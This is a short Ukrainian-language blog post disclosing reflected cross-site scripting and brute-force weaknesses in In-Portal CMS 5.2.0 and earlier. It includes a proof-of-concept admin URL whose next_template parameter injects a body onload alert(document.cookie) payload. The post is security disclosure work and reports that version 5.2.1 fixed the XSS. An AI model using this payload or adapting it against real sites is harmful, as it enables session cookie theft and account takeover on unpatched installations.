Websecurity - Веб безпека

29.07.2014

У липні, 22.07.2014, я знайшов Cross-Site Scripting та Brute Force уразливості в In-Portal CMS. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

29.08.2014

Cross-Site Scripting (WASC-08):

http://site/admin/index.php?env=-login:m0--1--s-&next_template=%22%3E%3Cbody%20onload=alert(document.cookie)%3E

Brute Force (WASC-11):

http://site/admin/index.php

Уразливі In-Portal CMS 5.2.0 та попередні версії. В версії In-Portal CMS 5.2.1 виправили XSS уразливість, а BF не стали виправляти обмежившись рекомендаціями по захисту від даних атак (з перших версій CMS розробник радить користувачам системи обмежувати доступ в адмінку по IP).

This entry was posted on 23:54 29.08.2014 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.